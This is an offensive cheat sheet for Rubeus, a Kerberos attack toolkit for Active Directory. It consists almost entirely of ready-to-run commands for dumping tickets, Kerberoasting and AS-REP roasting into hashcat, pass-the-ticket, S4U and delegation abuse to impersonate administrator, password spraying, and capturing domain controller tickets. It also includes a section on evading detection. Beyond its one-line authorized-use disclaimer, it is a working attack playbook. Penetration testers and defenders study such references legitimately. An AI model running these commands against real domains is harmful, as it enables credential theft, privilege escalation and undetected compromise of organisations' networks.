RUBEUS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Rubeus is a C# Kerberos abuse toolkit. Essential for Kerberos attacks in Active Directory environments.
BASIC USAGE#
Rubeus.exe <command> [options] # Help Rubeus.exe -h Rubeus.exe <command> /?
TICKET OPERATIONS#
LIST TICKETS#
# List current user tickets Rubeus.exe triage # List all tickets (elevated) Rubeus.exe triage /all # Detailed ticket dump Rubeus.exe klist # Dump all tickets (elevated) Rubeus.exe dump # Dump specific LUID Rubeus.exe dump /luid:0x3e7 # Export to kirbi files Rubeus.exe dump /nowrap
DESCRIBE TICKET#
# Describe kirbi file Rubeus.exe describe /ticket:ticket.kirbi # Describe base64 ticket Rubeus.exe describe /ticket:BASE64_TICKET
PURGE TICKETS#
# Purge current user tickets Rubeus.exe purge # Purge specific LUID Rubeus.exe purge /luid:0x3e7
KERBEROASTING#
# Kerberoast all users Rubeus.exe kerberoast # Kerberoast specific user Rubeus.exe kerberoast /user:svc_account # Output for hashcat Rubeus.exe kerberoast /outfile:hashes.txt Rubeus.exe kerberoast /format:hashcat # Output for john Rubeus.exe kerberoast /format:john # With credentials Rubeus.exe kerberoast /creduser:domain\user /credpassword:password # RC4 only (faster to crack) Rubeus.exe kerberoast /rc4opsec # AES encryption (stealthier) Rubeus.exe kerberoast /aes # Specific SPN Rubeus.exe kerberoast /spn:MSSQLSvc/sql.domain.local:1433 # Kerberoast with domain specified Rubeus.exe kerberoast /domain:domain.local /dc:dc01.domain.local
AS-REP ROASTING#
# Find AS-REP roastable users Rubeus.exe asreproast # Specific user Rubeus.exe asreproast /user:vulnuser # Output to file Rubeus.exe asreproast /outfile:asrep.txt # Format for hashcat Rubeus.exe asreproast /format:hashcat # With DC specified Rubeus.exe asreproast /dc:dc01.domain.local
TICKET REQUESTS#
TGT REQUEST#
# Request TGT with password Rubeus.exe asktgt /user:user /password:password /domain:domain.local # Request TGT with NTLM hash Rubeus.exe asktgt /user:user /rc4:NTHASH /domain:domain.local # Request TGT with AES key Rubeus.exe asktgt /user:user /aes256:AES_KEY /domain:domain.local # PTT (Pass-The-Ticket) - inject into session Rubeus.exe asktgt /user:user /password:password /ptt # Save to file Rubeus.exe asktgt /user:user /password:password /outfile:tgt.kirbi # No wrap (for copy/paste) Rubeus.exe asktgt /user:user /password:password /nowrap # Specific encryption Rubeus.exe asktgt /user:user /password:password /enctype:aes256
SERVICE TICKET REQUEST#
# Request service ticket Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local # Multiple services Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server,http/server # With PTT Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local /ptt # Alternative service name (Silver Ticket) Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local /altservice:http/server
PASS THE TICKET#
# Import ticket Rubeus.exe ptt /ticket:ticket.kirbi # Import base64 ticket Rubeus.exe ptt /ticket:BASE64_TICKET # Verify Rubeus.exe klist
S4U ATTACKS#
S4U2SELF#
# Request ticket for another user to self Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:administrator # With service Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target.domain.local
S4U2PROXY#
# S4U2Self then S4U2Proxy Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt # With TGT Rubeus.exe s4u /ticket:TGT.kirbi /impersonateuser:admin /msdsspn:cifs/target /ptt
CONSTRAINED DELEGATION#
# Abuse constrained delegation Rubeus.exe s4u /user:svc_constrained$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt # With alternate service Rubeus.exe s4u /user:svc_constrained$ /rc4:HASH /impersonateuser:admin /msdsspn:time/dc /altservice:ldap /ptt
RESOURCE-BASED CONSTRAINED DELEGATION#
# After setting msDS-AllowedToActOnBehalfOfOtherIdentity Rubeus.exe s4u /user:ATTACKER$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt
GOLDEN/SILVER TICKETS#
# Handled better by Mimikatz/ticketer.py # But Rubeus can PTT the results
UNCONSTRAINED DELEGATION#
MONITOR#
# Monitor for TGTs on unconstrained host Rubeus.exe monitor /interval:5 /filteruser:DC$ # Target specific user Rubeus.exe monitor /targetuser:administrator /interval:5 # With nowrap for copy/paste Rubeus.exe monitor /interval:5 /nowrap
HARVEST#
# One-time harvest Rubeus.exe harvest /interval:5
RENEWAL#
# Renew ticket Rubeus.exe renew /ticket:TGT.kirbi # Renew and PTT Rubeus.exe renew /ticket:TGT.kirbi /ptt # Auto-renew Rubeus.exe renew /ticket:TGT.kirbi /autorenew
PASSWORD OPERATIONS#
# Change password (requires current password) Rubeus.exe changepw /ticket:TGT.kirbi /new:NewPassword123! # Reset password (requires appropriate rights) Rubeus.exe changepw /ticket:TGT.kirbi /new:NewPassword123! /targetuser:domain\targetuser
BRUTE FORCE#
# Brute force username Rubeus.exe brute /password:Password123 /domain:domain.local # With user list Rubeus.exe brute /users:users.txt /password:Password123 /domain:domain.local # Spray password Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:domain.local
CROSS-DOMAIN#
# Request referral Rubeus.exe asktgt /user:user /domain:domain.local /password:pass /dc:dc.domain.local /createnetonly:C:\Windows\System32\cmd.exe # Cross-domain ticket Rubeus.exe asktgs /ticket:TGT.kirbi /service:krbtgt/trustedforest.local /dc:dc.domain.local
MISCELLANEOUS#
CREATE NETONLY PROCESS#
# Create process with alternate credentials Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show # Then inject ticket Rubeus.exe ptt /luid:0x... /ticket:ticket.kirbi
TICKET CACHE#
# Show ticket cache Rubeus.exe tgtdeleg # Obtain usable TGT via delegation trick Rubeus.exe tgtdeleg /target:cifs/dc.domain.local
HASH EXTRACTION#
# Extract AES keys (requires admin) Rubeus.exe hash /user:user /password:password /domain:domain.local
CURRENT USER#
# Get current user info Rubeus.exe currentluid
EVASION#
# Use /opsec flag where available Rubeus.exe kerberoast /opsec # Use AES encryption Rubeus.exe asktgt /user:user /aes256:KEY /opsec # Avoid detections: # - Use AES instead of RC4 # - Target specific SPNs # - Limit concurrent requests
COMMON WORKFLOWS#
KERBEROAST ATTACK#
Rubeus.exe kerberoast /outfile:kerberoast.txt hashcat -m 13100 kerberoast.txt wordlist.txt
AS-REP ROAST#
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt hashcat -m 18200 asrep.txt wordlist.txt
PASS THE HASH (get TGT)#
Rubeus.exe asktgt /user:admin /rc4:HASH /ptt
CONSTRAINED DELEGATION#
Rubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt dir \\target\c$
UNCONSTRAINED DELEGATION#
# Coerce auth (PetitPotam/PrinterBug) # On unconstrained host: Rubeus.exe monitor /filteruser:DC$ /interval:5 /nowrap # Capture and use TGT
QUICK REFERENCE#
Rubeus.exe kerberoast # Kerberoast Rubeus.exe asreproast # AS-REP roast Rubeus.exe asktgt /user:x /rc4:HASH /ptt # Request TGT Rubeus.exe asktgs /ticket:x /service:x /ptt # Request TGS Rubeus.exe s4u /user:x /rc4:HASH /impersonateuser:admin /msdsspn:x /ptt # S4U Rubeus.exe ptt /ticket:ticket.kirbi # Pass the ticket Rubeus.exe dump # Dump all tickets Rubeus.exe triage # List tickets Rubeus.exe monitor /interval:5 # Monitor for TGTs